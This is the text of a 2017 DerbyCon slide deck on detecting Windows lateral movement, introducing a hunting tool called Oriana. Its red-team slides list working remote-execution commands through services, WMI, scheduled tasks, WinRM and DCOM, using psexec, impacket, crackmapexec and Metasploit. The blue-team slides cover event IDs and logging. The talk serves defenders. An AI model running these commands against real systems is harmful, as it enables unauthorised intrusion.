After obtaining an initial foothold on an environment, attackers are forced to embark in lateral movement techniques in order to be successful in identifying and exfiltrating sensitive information. To stay ahead of the bad guys, the Blue team needs to have a clear understanding of these techniques as well as the forensic artifacts these techniques leave behind on the victim hosts. Armed with this knowledge, we can proactively hunt for lateral movement in the environment before exfiltration can occur. This presentation will analyze Lateral Movement from both a Red and Blue team perspective and introduce Oriana, a lateral movement hunting tool that can assist the Blue team in catching the adversary.

1. Oriana: Hunting Lateral
Movement for Fun & Profit
DERBYCON 2017
Mauricio Velazco
@mvelazco

2. $whoami
✘Peruvian
✘Infosec Geek
✘Blue team ( former Red )
✘@mvelazco

3. Agenda
✘Intro
✘Red Team
✘Blue Team
✘Oriana : Lateral Movement Hunting Tool

4. 1.
Intro

5. ✘Techniques that enable an adversary to access and control remote
systems on a network.
https://attack.mitre.org/wiki/Lateral_Movement
Lateral Movement
😸

6. Attackers are forced to move in the
environment

7. LM in the Attack Lifecycle
Initial
Compromise
Privilege
Escalation
Recoinissance Lateral
Movement
Exfiltration

8. ✘Our goal is not to prevent the intial
compromise but to avoid data
exfiltration
✘If we can prevent or detect lateral
movement, we win!
Why care ?

9. 2.
Red Team

10. How is it done?
✘Vulnerability Explotation
✘Logon Scripts
✘Abusing application deployment software
✘Removable media
✘Abusing legitimate Windows features
Out of all the incident response engagements that we conducted; 100% of them involved the threat
actor compromising valid credentials during the attack.
https://www.fireeye.com/blog/threat-research/2015/08/malware_lateral_move.html
“
”

11. abusing Windows Services
✘Network
TCP/135 & Random - RPC
TCP/445 – SMB & RPC over SMB (svcctl named pipe)
✘Native
sc host create badService binpath= “c:bad.exe” &&
sc host start badService
Invoke-PsExec –CN host –C “bad.exe” –SN badService
✘Other
psexec.exe host –u user –p pass cmd.exe
usemodule lateralmovement/invoke_psexec
use exploit/windows/smb/psexec_psh
psexec.py domain/user@host cmd.exe
smbexec.py domain/user@host cmd.exe
paexec.exe –u user –p pass cmd.exe

12. Living off the Land

13. abusing WMI
✘Network
TCP/135 & Random - RPC
✘Native
wmic /user:U /password:P /node:host process call create “c:bad.exe”
Invoke-WmiMethod –CN Host -Class Win32_Process -Name create -
ArgumentList “C:cmd.exe“ –Credential $cred
✘Other
wmiexec.py User:Pass@IP ipconfig
pth-wmis -U User //192.168.147.159 ‘ipconfig’
wmiexec.vbs /cmd IP User Pass ipconfig
crackmapexec IP -u User -p Pass -x whoami --exec-method wmiexec
usemodule lateral_movement/invoke_wmi

14. abusing Task Scheduler
✘Network
TCP/135 & Random - RPC
TCP/445 – RPC over SMB (atsvc named pipe)
✘Native
at host HH:MM c:bad.exe
schtasks //S host /create /tn evilTask /tr c:bad.exe /sc once /st 00:00
New-ScheduledTaskAction ?
✘Other
atexec.py domain/user@host c:bad.exe
crackmapexec IP -u mburns -p pass -x ipconfig --exec-method atexec

15. abusing WinRM 1
✘Network
TCP/5985 WsMan
✘Native
winrs -r:host cmd
✘Other
use auxiliary/scanner/winrm/winrm_cmd
https://blog.rapid7.com/2012/11/08/abusing-windows-remote-management-winrm-with-
metasploit/
https://www.trustedsec.com/2017/09/using-winrm-meterpreter/
winrm set winrm/config/service @{AllowUnencrypted="true"}

16. abusing WinRM 2: Powershell remoting
✘Network
TCP/5985 WsMan
✘Native
Invoke-Command –ComputerName Host –ScriptBlock {ipconfig}
Enter-PsSession -ComputerName Host
✘Other
lateral_movement/invoke_psremoting

17. Abusing DCOM
✘Network
TCP/135 & Random - RPC
✘DCOM Objects
MMC20.Application (Windows 7, Windows 10, Server 2012R2)
AppID: 7e0423cd-1119-0928-900c-e6d4a52a0715
ShellWindows (Windows 7, Windows 10, Server 2012R2)
AppID: 9BA05972-F6A8-11CF-A442-00A0C90A8F39
ShellBrowserWindow (Windows 10, Server 2012R2)
AppID: C08AFD90-F2A1-11D1-8455-00A0C91F3880
https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-
com-object/
https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/

18. abusing DCOM
✘Native
$com=[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application",“IP"))
$com.Document.ActiveView.ExecuteShellCommand(“ipconfig.exe",$null,$null,"7")
$com=[Type]::GetTypeFromCLSID(‘9BA05972-F6A8-11CF-A442-00A0C90A8F39’,’IP’)
$obj = [System.Activator]::CreateInstance($com)
$item = $obj.Item()
$item.Document.Application.ShellExecute(“cmd.exe”,”/c
calc.exe”,”C:windowssystem32”,$null,0)
$com=[Type]::GetTypeFromCLSID(C08AFD90-F2A1-11D1-8455-00A0C91F3880‘’,’IP’)
$obj = [System.Activator]::CreateInstance($com)
$obj.Document.Application.ShellExecute(“cmd.exe”,”/c
calc.exe”,”C:windowssystem32”,$null,0)

19. Excel and DCOM
https://posts.specterops.io/lateral-movement-using-excel-application-and-dcom-
enigma0x3-on-wordpress-com-d11d56e504dc

20. Abusing RDP
✘Network
TCP/3389 RPC
✘Native
mstsc.exe
✘Other
rdesktop
xfreerdp

21. Service
Task
Scheduler
WMI WinRM DCOM
empire
impacket
metasploit
cobalt
strike
cme

22. 2.
Blue Team

23. Authentication & Logon
✘Account Logon vs Logon/Logoff
✘Account Logon
Kerberos: 4768 - Authentication Ticket TGT
NTLM : 4776 – Credential Validation
✘Logon/Logoff
4624 – Logon
https://blogs.msdn.microsoft.com/ericfitz/2005/08/04/deciphering-account-logon-events/

25. Using a Domain Account & Kerberos

26. Using a Domain Account & Kerberos

27. Using a Domain Account & NTLM

28. Using a Local Account

29. ✘4776
Who is using NTLM authentication on the domain ?
Anyonw using pentesting tools ? Metasploit, crackmapexec, impacket...
Who is using Local Accounts ?
✘4769 - Kerberos service ticket was requested
Lateral Movement
Anyone running BloodHound ?

30. System Events
✘Security System Extension
7045: Service Installed
7036: Service entered running state
✘Fields
Service Name
Cmdline !

31. System Events

32. Object Access
✘Other Object Access Events
4698: A scheduled task was created
4699: A scheduled task was deleted
✘Fields
Task Name
Cmdline !
Parameters

33. Object Access

34. WMI Activity
✘Trace
Event 1: Start of the event sequence
Event 2: Actual Event
Event 3: End of the event sequence
✘Fields

✘wevtutil set-log "Microsoft-Windows-WMI-
Activity/Trace" /e:true /r:false /ms:20000

35. WMI Activity

36. Detailed Tracking
✘Audit Process Creation
4688: A new process has been created
✘Fields
Logon Id
Process Name
Command Line

37. WMI Activity

38. DCOM MMC20

39. DCOM ShellWindows & ShellBrowserWindow

40. Windows Remote Management
✘Analytical
288 : WSMan API Call
1044:Response Handling
✘Debug
Noise
✘Operational
81: Request Handling
169: User Authentication
✘Process
winrshost.exe spawns a child proc
wsmprovhost.exe spawns a child proc

41. Windows Remote Management

42. Powershell Remoting

43. 3.
Oriana

44. Threat Hunting

45. Oriana 1.0
✘Use only Windows event logs as
input: 4624, 7045, 4698, Wmi 2
✘Provide visibility
✘Identify potential LM events
WMI, Services, Tasks
TO DO: WinRM, DCOM
✘Ability to pivot through data points

46. Process
Index Analyze Hunt!Export

47. Export
✘Get-WinEvent & Export-CSV
✘1 CSV per host dropped on a share

48. Export

49. Export

50. Index
Host 4624 User
7045
Service
4698
Task
Wmi
Event

51. Visibility
✘Detailed views for
Host
User
Service
Task
✘Perform basic calculations
# of unique hosts a user has authenticated to locally
# of unique hosts a user has authenticated to remotely
# of unique users that authenticated to a host locally
# of unique users that authenticated to a host remotely

53. DEMO 1

54. LM Detection
4624
4698
7045
Wmi

55. Frequency Analysis

56. Hunt random: N-gram score
✘Reg expressions are based on
a sample and lack context
P r o d u c t W F P N e t M o n

57. DEMO 2

58. Future Work
✘Ingest other events
4625 Failed Logon
5140 File Share
4688 Process Creation
4648 Explicit Credentials
✘User fields for frequency
analysis and analytics
Source IP/Host
✘LDAP Integration
✘Use Logon Id as a foreign key
✘Ideas ?
@mvelazco

60. Oriana: Hunting Lateral
Movement for Fun & Profit
DERBYCON 2017
Mauricio Velazco
@mvelazco